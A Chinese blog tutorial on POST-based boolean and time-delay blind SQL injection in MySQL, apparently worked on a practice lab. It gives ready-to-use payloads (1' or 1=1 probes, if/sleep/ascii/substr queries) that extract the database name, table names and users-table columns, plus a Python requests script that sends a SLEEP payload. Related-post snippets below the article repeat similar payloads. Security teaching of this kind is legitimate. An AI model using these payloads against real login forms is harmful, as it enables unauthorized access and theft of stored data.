POST方式时间注入

于 2024-06-21 11:12:50 发布
阅读量638 收藏 6
点赞数 19
文章标签: 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84445424/article/details/139854856
版权

POST 方式时间注入是一种 SQL 注入攻击方法,它利用了 Web 应用程序中对 POST 请求参数处理不当的漏洞。在这种攻击中,攻击者会构造特定的 POST 请求,其中包含恶意的时间相关数据,以达到绕过验证、执行非法操作或获取敏感信息的目的。

基于布尔型/时间延迟POST注入

使用hackbar

输入?id=1

输入?id=1'

输入?id=1"

无报错信息,由此可推断这是一道非报错型注入

在不知道用户情况下,POST型中要判断字符型注入,使用万能语句如:

1 or 1=1 -- #             1) or 1=1-- #            1)) or 1=1-- #

1' or 1=1 -- #            1') or 1=1-- #           1') or 1=1-- #

1" or 1=1 -- #           1") or 1=1-- #          1") or 1=1-- #

由此可知此题是布尔型注入

猜数据库

uname=1' or left(database(),1)>'a' -- #&passwd=1          返回正确

uname=1' or left(database(),1)>'s' -- #&passwd=1          返回错误

uname=1' or left(database(),1)='s' -- #&passwd=1          返回正确    

由此推断出数据库第一位为s.那么猜第二位:uname=1' or left(database(),2)>'sa' -- #&passwd=1

猜数据库长度

uname=1&passwd=1' or if(length(database())=8,1,sleep(5))-- #

1.猜数据库名(可以用 <  >  = 比较,对字符进行范围的判断,然后用二分法不断缩小范围)

uname=1&passwd=1' or If(ascii(substr(database(),1,1))=115,1,sleep(5))-- #

uname=1&passwd=1' or If(ascii(substr(database(),2,1))=101,1,sleep(5))-- #

……….

2.猜数据库中的表

猜测第一个数据表的第一位是 e,...依次类推,得到 emails

uname=1&passwd=1' or If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))-- #

uname=1&passwd=1' or If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1))=101,1,sleep(5))-- #

3.猜users表里的列

uname=1&passwd=1' or If(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=105,1,sleep(5))-- #

以此类推得到数据库的内容

以下是一个使用 Python 编写的示例代码,演示了如何进行 POST 方式时间注入:

import requests

# 目标 URL
url = "http://example.com/login"

# 构造恶意的时间注入 payload
payload = "username=admin' AND SLEEP(5)-- "

data = {
    "username": payload,
    "password": "pass123"
}

# 发送 POST 请求
response = requests.post(url, data=data)

# 打印响应时间
print("Response time:", response.elapsed.total_seconds())

温馨提示:时间注入是非法的攻击行为,会对他人的系统和数据造成严重的损害,在实际开发中,请遵守法律法规和道德规范。

2401_84445424
关注
  • 19
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL 注入漏洞(八)时间注入/延时注入
不秃头的程序Yang
06-12 4586
二、代码分析 三、sqlmap测时间注入
sql漏洞注入——时间注入
m0_73756016的博客
11-01 845
id=1' and if(length(database())>8,sleep(5),0)--+1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。1" and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
Web安全原理剖析(五)——时间注入攻击
热门推荐
Phantom03167的博客
09-13 1万+
时间注入攻击
SQL注入之路之四:时间注入
weixin_62715196的博客
08-11 786
时间注入又名延时注入,属于盲注的一种,通常是某个注入点无法通过布尔型注入获取数据而采取的一种突破注入的技巧。在MySQL里函数sleep()是延时的意思,sleep(10)就是数据库延时10秒返回内容。判断注入可以使用’and sleep(10)意思是数据库延时10秒返回内容值(页面响应时间至少为10秒)MySQL延时注入用到的函数sleep()、if()、substring() select if(2>1,sleep(10),0)
sql学习4(时间注入
cyy001128的博客
04-05 651
id=1’ and if(ascii(substr((select database()),1,1))>100,1,sleep(5))–+ //如果数据库名字的第一个字符的acsii值小于100,则进行延时。id=1%20and%20if(substring(database(),1,1)=%27a%27,sleep(5),sleep(1))观察请求的时间,大概在5秒以上,说明构造的sleep(5) 语句起作用,可以把这个时间线作为sql 注入的判断依据。步骤同上,得到表名flag。
第九节 POST基于时间和布尔的盲注-01
09-15
POST 基于时间的盲注的优点是可以检测到注入点的存在,但是这种方法可能会受到服务器的性能和网络延迟的影响。在某些情况下,服务器的响应时间可能会受到其他因素的影响,从而导致检测结果不准确。 三、POST 基于...
SQL注入思路详解
12-14
对于每种注入方式,其优先级和应用场景不同,攻击者通常会先尝试简单且效率高的方法,如联合查询注入。 为了防止SQL注入,开发者应遵循以下最佳实践: - 使用预编译的SQL语句(如PDO预处理语句或参数化查询)。 - ...
Pangolin穿山甲SQL注入工具
12-03
Pangolin穿山甲通过模拟不同的SQL注入技术,如盲注、时间延迟注入、错误注入等,可以有效地测试出MySQL数据库的防护能力。 使用Pangolin穿山甲进行SQL注入测试时,用户需要具备一定的SQL知识,了解基本的查询结构和...
Sql注入平台.zip
02-21
一个在本地搭建的SQL注入的平台,能够进行SQL注入,适用于GET和POST场景 包含了基于union查询的注入、基于报错的注入、基于floor的报错注入、基于boolean的盲注、基于时间的盲注……
6.时间注入
kinght的博客
08-26 2090
title: 6.时间注入 date: 2020-08-07 14:05:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入 我们在上一章节已经基本了解了盲注的概念和布尔盲注,时间注入与布尔盲注原理类似,也是盲注的一种。 什么是时间注入 时间注入时间盲注、延时注入都是它,它使用在一种比布尔盲注还要极端的状态 <?php error_reporting(E_ALL&~E_WARNING); include("../s.
【网络安全】SQL注入--时间注入
边缘拼命划水的小陈
04-06 654
使用默认模式 自动为y。获取当前使用的数据库
sql注入时间注入
m0_63436163的博客
04-15 690
如果想要获取数据内容,可以用截取字符再进行字符对比,如果相同就进行延时。这样就能获取字符,接着再拼接就是当前库的内容。在黑盒模式下可以使用 sqlmap 对注入检测。sqlmap 支持多种数据库注入,而且支持多种注入方式。在页面中分析源码,直接获取 name 带进数据库进行查询,但是是否存在记录页面返回都一样。--technique=T 检测方法为时间注入。-u 表示检测的 url。-p 指定的检测参数。
SQL注入时间注入
2301_79299101的博客
09-25 716
mysql 延时注入用到的函数 sleep() 、if()、substring() select if(2>1,sleep(10),0) 2>1 这个部分就是你注入要构造的 SQL 语句。
SQL注入——时间盲注
heyingcheng的博客
03-07 1097
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
Web安全:SQL注入时间盲注原理+步骤+实战操作
最新发布
wangyuxiang946的博客
05-21 2233
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
时间注入的一些基本思路
weixin_45945976的博客
10-24 773
时间注入的一些基本思路 原理 利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 1,判断当前库名的长度 语法:and if (length(database())=x,0,sleep(5))#0 //判断数据库名字长度 实例:http://10.6.18.36/time/?type=1 and if (length(database())>11,0,sleep(5))#0 当前库名长度为12 2,猜库名 语法:and if (ascii(substr
【漏洞挖掘】——19、SSI漏洞的利用思路
Fly_鹏程万里
03-03 7117
在测试任意文件上传漏洞的时候如果目标服务端可能不允许上传php后缀的文件,但是目标服务器开启了SSI与CGI支持,此时我们可以上传一个shtml文件并利用语法执行任意命令。
sqlmap post注入常见问题
06-06
在使用SQLMap进行POST注入时,常见的问题包括: 1. Cookie不正确:如果您正在尝试使用Cookie进行身份验证,则需要确保Cookie正确,并且已正确设置。 2. 无法识别字符集:SQLMap需要知道目标网站使用的字符集才能...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值